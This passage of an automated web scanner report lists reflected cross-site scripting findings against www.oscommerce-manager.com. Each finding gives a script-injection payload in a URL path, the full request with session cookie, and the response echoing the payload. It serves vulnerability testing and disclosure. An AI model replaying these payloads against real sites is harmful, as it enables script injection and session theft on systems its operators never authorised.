GET /modules/aggregator68db8"><script>alert(1)</script>45158dab790/style/customer_testimonials.css?6 HTTP/1.1
Host: www.oscommerce-manager.com
Proxy-Connection: keep-alive
Referer: http://www.oscommerce-manager.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSf6cba6c583dc3db17176d16b553730b0=1cba0473286498bbc9e50fefc83cb0c0

Response

HTTP/1.1 404 Not Found
Date: Sun, 15 May 2011 14:00:03 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 15 May 2011 14:00:03 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 16957

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" dir="ltr
...[SNIP]...
<a rel="nofollow" href="javascript: void(window.open('http://translate.google.com/translate?u='+escape('www.oscommerce-manager.com/modules/aggregator68db8"><script>alert(1)</script>45158dab790/style/customer_testimonials.css?6')+'&amp;langpair=en%7Cde', 'English_to_German', 'resizable,scrollbars,status'))">
...[SNIP]...

3.113. http://www.oscommerce-manager.com/modules/aggregator/style/customer_testimonials.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.oscommerce-manager.com
Path:   /modules/aggregator/style/customer_testimonials.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 995f5"><script>alert(1)</script>a0c6474d956 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /modules/aggregator/style995f5"><script>alert(1)</script>a0c6474d956/customer_testimonials.css?6 HTTP/1.1
Host: www.oscommerce-manager.com
Proxy-Connection: keep-alive
Referer: http://www.oscommerce-manager.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSf6cba6c583dc3db17176d16b553730b0=1cba0473286498bbc9e50fefc83cb0c0

Response

HTTP/1.1 404 Not Found
Date: Sun, 15 May 2011 14:00:30 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 15 May 2011 14:00:30 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 16957

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" dir="ltr
...[SNIP]...
<a rel="nofollow" href="javascript: void(window.open('http://translate.google.com/translate?u='+escape('www.oscommerce-manager.com/modules/aggregator/style995f5"><script>alert(1)</script>a0c6474d956/customer_testimonials.css?6')+'&amp;langpair=en%7Cde', 'English_to_German', 'resizable,scrollbars,status'))">
...[SNIP]...

3.114. http://www.oscommerce-manager.com/modules/aggregator/style/customer_testimonials.css [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.oscommerce-manager.com
Path:   /modules/aggregator/style/customer_testimonials.css

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1ebfc"><script>alert(1)</script>470968f84d8 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /modules/aggregator/style/customer_testimonials.css1ebfc"><script>alert(1)</script>470968f84d8?6 HTTP/1.1
Host: www.oscommerce-manager.com
Proxy-Connection: keep-alive
Referer: http://www.oscommerce-manager.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSf6cba6c583dc3db17176d16b553730b0=1cba0473286498bbc9e50fefc83cb0c0

Response

HTTP/1.1 404 Not Found
Date: Sun, 15 May 2011 14:00:51 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 15 May 2011 14:00:51 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 16957

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" dir="ltr
...[SNIP]...
<a rel="nofollow" href="javascript: void(window.open('http://translate.google.com/translate?u='+escape('www.oscommerce-manager.com/modules/aggregator/style/customer_testimonials.css1ebfc"><script>alert(1)</script>470968f84d8?6')+'&amp;langpair=en%7Cde', 'English_to_German', 'resizable,scrollbars,status'))">
...[SNIP]...

3.115. http://www.oscommerce-manager.com/modules/book/book.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.oscommerce-manager.com
Path:   /modules/book/book.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6d98c"><script>alert(1)</script>b4b89e17f6a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /modules6d98c"><script>alert(1)</script>b4b89e17f6a/book/book.css?6 HTTP/1.1
Host: www.oscommerce-manager.com
Proxy-Connection: keep-alive
Referer: http://www.oscommerce-manager.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSf6cba6c583dc3db17176d16b553730b0=1cba0473286498bbc9e50fefc83cb0c0

Response

HTTP/1.1 404 Not Found
Date: Sun, 15 May 2011 13:59:22 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 15 May 2011 13:59:22 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 16667

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" dir="ltr
...[SNIP]...
<a rel="nofollow" href="javascript: void(window.open('http://translate.google.com/translate?u='+escape('www.oscommerce-manager.com/modules6d98c"><script>alert(1)</script>b4b89e17f6a/book/book.css?6')+'&amp;langpair=en%7Cde', 'English_to_German', 'resizable,scrollbars,status'))">
...[SNIP]...

3.116. http://www.oscommerce-manager.com/modules/book/book.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.oscommerce-manager.com
Path:   /modules/book/book.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8db62"><script>alert(1)</script>404afc2e942 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /modules/book8db62"><script>alert(1)</script>404afc2e942/book.css?6 HTTP/1.1
Host: www.oscommerce-manager.com
Proxy-Connection: keep-alive
Referer: http://www.oscommerce-manager.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSf6cba6c583dc3db17176d16b553730b0=1cba0473286498bbc9e50fefc83cb0c0

Response

HTTP/1.1 404 Not Found
Date: Sun, 15 May 2011 13:59:43 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 15 May 2011 13:59:43 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 16667

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" dir="ltr
...[SNIP]...
<a rel="nofollow" href="javascript: void(window.open('http://translate.google.com/translate?u='+escape('www.oscommerce-manager.com/modules/book8db62"><script>alert(1)</script>404afc2e942/book.css?6')+'&amp;langpair=en%7Cde', 'English_to_German', 'resizable,scrollbars,status'))">
...[SNIP]...

3.117. http://www.oscommerce-manager.com/modules/book/book.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.oscommerce-manager.com
Path:   /modules/book/book.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 98755"><script>alert(1)</script>756dc892b26 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /modules/book/book.css98755"><script>alert(1)</script>756dc892b26?6 HTTP/1.1
Host: www.oscommerce-manager.com
Proxy-Connection: keep-alive
Referer: http://www.oscommerce-manager.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSf6cba6c583dc3db17176d16b553730b0=1cba0473286498bbc9e50fefc83cb0c0

Response

HTTP/1.1 404 Not Found
Date: Sun, 15 May 2011 14:00:05 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 15 May 2011 14:00:05 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 16667

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" dir="ltr
...[SNIP]...
<a rel="nofollow" href="javascript: void(window.open('http://translate.google.com/translate?u='+escape('www.oscommerce-manager.com/modules/book/book.css98755"><script>alert(1)</script>756dc892b26?6')+'&amp;langpair=en%7Cde', 'English_to_German', 'resizable,scrollbars,status'))">
...[SNIP]...

3.118. http://www.oscommerce-manager.com/modules/fckeditor/fckeditor.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.oscommerce-manager.com
Path:   /modules/fckeditor/fckeditor.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b4d1e"><script>alert(1)</script>568ef29fa29 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /modulesb4d1e"><script>alert(1)</script>568ef29fa29/fckeditor/fckeditor.css?6 HTTP/1.1
Host: www.oscommerce-manager.com
Proxy-Connection: keep-alive
Referer: http://www.oscommerce-manager.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSf6cba6c583dc3db17176d16b553730b0=1cba0473286498bbc9e50fefc83cb0c0

Response

HTTP/1.1 404 Not Found
Date: Sun, 15 May 2011 13:59:22 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 15 May 2011 13:59:22 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 16767

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" dir="ltr
...[SNIP]...
<a rel="nofollow" href="javascript: void(window.open('http://translate.google.com/translate?u='+escape('www.oscommerce-manager.com/modulesb4d1e"><script>alert(1)</script>568ef29fa29/fckeditor/fckeditor.css?6')+'&amp;langpair=en%7Cde', 'English_to_German', 'resizable,scrollbars,status'))">
...[SNIP]...

3.119. http://www.oscommerce-manager.com/modules/fckeditor/fckeditor.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.oscommerce-manager.com
Path:   /modules/fckeditor/fckeditor.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a8b60"><script>alert(1)</script>c46cf9ef0fe was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /modules/fckeditora8b60"><script>alert(1)</script>c46cf9ef0fe/fckeditor.css?6 HTTP/1.1
Host: www.oscommerce-manager.com
Proxy-Connection: keep-alive
Referer: http://www.oscommerce-manager.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSf6cba6c583dc3db17176d16b553730b0=1cba0473286498bbc9e50fefc83cb0c0

Response

HTTP/1.1 404 Not Found
Date: Sun, 15 May 2011 13:59:43 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 15 May 2011 13:59:43 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 16767

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" dir="ltr
...[SNIP]...
<a rel="nofollow" href="javascript: void(window.open('http://translate.google.com/translate?u='+escape('www.oscommerce-manager.com/modules/fckeditora8b60"><script>alert(1)</script>c46cf9ef0fe/fckeditor.css?6')+'&amp;langpair=en%7Cde', 'English_to_German', 'resizable,scrollbars,status'))">
...[SNIP]...

3.120. http://www.oscommerce-manager.com/modules/fckeditor/fckeditor.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.oscommerce-manager.com
Path:   /modules/fckeditor/fckeditor.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 78a30"><script>alert(1)</script>484cc22110d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /modules/fckeditor/fckeditor.css78a30"><script>alert(1)</script>484cc22110d?6 HTTP/1.1
Host: www.oscommerce-manager.com
Proxy-Connection: keep-alive
Referer: http://www.oscommerce-manager.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSf6cba6c583dc3db17176d16b553730b0=1cba0473286498bbc9e50fefc83cb0c0

Response

HTTP/1.1 404 Not Found
Date: Sun, 15 May 2011 14:00:07 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 15 May 2011 14:00:07 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 16767

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" dir="ltr
...[SNIP]...
<a rel="nofollow" href="javascript: void(window.open('http://translate.google.com/translate?u='+escape('www.oscommerce-manager.com/modules/fckeditor/fckeditor.css78a30"><script>alert(1)</script>484cc22110d?6')+'&amp;langpair=en%7Cde', 'English_to_German', 'resizable,scrollbars,status'))">
...[SNIP]...

3.121. http://www.oscommerce-manager.com/modules/lightbox2/css/lightbox.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.oscommerce-manager.com
Path:   /modules/lightbox2/css/lightbox.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 19527"><script>alert(1)</script>66a5488c9ea was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /modules19527"><script>alert(1)</script>66a5488c9ea/lightbox2/css/lightbox.css?6 HTTP/1.1
Host: www.oscommerce-manager.com
Proxy-Connection: keep-alive
Referer: http://www.oscommerce-manager.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSf6cba6c583dc3db17176d16b553730b0=1cba0473286498bbc9e50fefc83cb0c0

Response

HTTP/1.1 404 Not Found
Date: Sun, 15 May 2011 13:59:36 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 15 May 2011 13:59:36 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 16797

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" dir="ltr
...[SNIP]...
<a rel="nofollow" href="javascript: void(window.open('http://translate.google.com/translate?u='+escape('www.oscommerce-manager.com/modules19527"><script>alert(1)</script>66a5488c9ea/lightbox2/css/lightbox.css?6')+'&amp;langpair=en%7Cde', 'English_to_German', 'resizable,scrollbars,status'))">
...[SNIP]...

3.122. http://www.oscommerce-manager.com/modules/lightbox2/css/lightbox.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.oscommerce-manager.com
Path:   /modules/lightbox2/css/lightbox.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 17f01"><script>alert(1)</script>dcd70175ca0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /modules/lightbox217f01"><script>alert(1)</script>dcd70175ca0/css/lightbox.css?6 HTTP/1.1
Host: www.oscommerce-manager.com
Proxy-Connection: keep-alive
Referer: http://www.oscommerce-manager.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSf6cba6c583dc3db17176d16b553730b0=1cba0473286498bbc9e50fefc83cb0c0

Response

HTTP/1.1 404 Not Found
Date: Sun, 15 May 2011 13:59:58 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 15 May 2011 13:59:58 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 16797

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" dir="ltr
...[SNIP]...
<a rel="nofollow" href="javascript: void(window.open('http://translate.google.com/translate?u='+escape('www.oscommerce-manager.com/modules/lightbox217f01"><script>alert(1)</script>dcd70175ca0/css/lightbox.css?6')+'&amp;langpair=en%7Cde', 'English_to_German', 'resizable,scrollbars,status'))">
...[SNIP]...

3.123. http://www.oscommerce-manager.com/modules/lightbox2/css/lightbox.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.oscommerce-manager.com
Path:   /modules/lightbox2/css/lightbox.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bb10a"><script>alert(1)</script>71a3c70d3e9 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /modules/lightbox2/cssbb10a"><script>alert(1)</script>71a3c70d3e9/lightbox.css?6 HTTP/1.1
Host: www.oscommerce-manager.com
Proxy-Connection: keep-alive
Referer: http://www.oscommerce-manager.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSf6cba6c583dc3db17176d16b553730b0=1cba0473286498bbc9e50fefc83cb0c0

Response

HTTP/1.1 404 Not Found
Date: Sun, 15 May 2011 14:00:21 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 15 May 2011 14:00:21 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 16797

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" dir="ltr
...[SNIP]...
<a rel="nofollow" href="javascript: void(window.open('http://translate.google.com/translate?u='+escape('www.oscommerce-manager.com/modules/lightbox2/cssbb10a"><script>alert(1)</script>71a3c70d3e9/lightbox.css?6')+'&amp;langpair=en%7Cde', 'English_to_German', 'resizable,scrollbars,status'))">
...[SNIP]...

3.124. http://www.oscommerce-manager.com/modules/lightbox2/css/lightbox.css [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.oscommerce-manager.com
Path:   /modules/lightbox2/css/lightbox.css

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 761d0"><script>alert(1)</script>1b47fb348be was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /modules/lightbox2/css/lightbox.css761d0"><script>alert(1)</script>1b47fb348be?6 HTTP/1.1
Host: www.oscommerce-manager.com
Proxy-Connection: keep-alive
Referer: http://www.oscommerce-manager.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSf6cba6c583dc3db17176d16b553730b0=1cba0473286498bbc9e50fefc83cb0c0

Response

HTTP/1.1 404 Not Found
Date: Sun, 15 May 2011 14:00:44 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 15 May 2011 14:00:44 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 16797

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" dir="ltr
...[SNIP]...
<a rel="nofollow" href="javascript: void(window.open('http://translate.google.com/translate?u='+escape('www.oscommerce-manager.com/modules/lightbox2/css/lightbox.css761d0"><script>alert(1)</script>1b47fb348be?6')+'&amp;langpair=en%7Cde', 'English_to_German', 'resizable,scrollbars,status'))">
...[SNIP]...

3.125. http://www.oscommerce-manager.com/modules/lightbox2/js/auto_image_handling.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.oscommerce-manager.com
Path:   /modules/lightbox2/js/auto_image_handling.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 77c9e"><script>alert(1)</script>f530f647a18 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /modules77c9e"><script>alert(1)</script>f530f647a18/lightbox2/js/auto_image_handling.js?6 HTTP/1.1
Host: www.oscommerce-manager.com
Proxy-Connection: keep-alive
Referer: http://www.oscommerce-manager.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSf6cba6c583dc3db17176d16b553730b0=1cba0473286498bbc9e50fefc83cb0c0

Response

HTTP/1.1 404 Not Found
Date: Sun, 15 May 2011 14:00:39 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 15 May 2011 14:00:39 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 16887

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" dir="ltr
...[SNIP]...
<a rel="nofollow" href="javascript: void(window.open('http://translate.google.com/translate?u='+escape('www.oscommerce-manager.com/modules77c9e"><script>alert(1)</script>f530f647a18/lightbox2/js/auto_image_handling.js?6')+'&amp;langpair=en%7Cde', 'English_to_German', 'resizable,scrollbars,status'))">
...[SNIP]...

3.126. http://www.oscommerce-manager.com/modules/lightbox2/js/auto_image_handling.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.oscommerce-manager.com
Path:   /modules/lightbox2/js/auto_image_handling.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d5d83"><script>alert(1)</script>a9586df36a6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

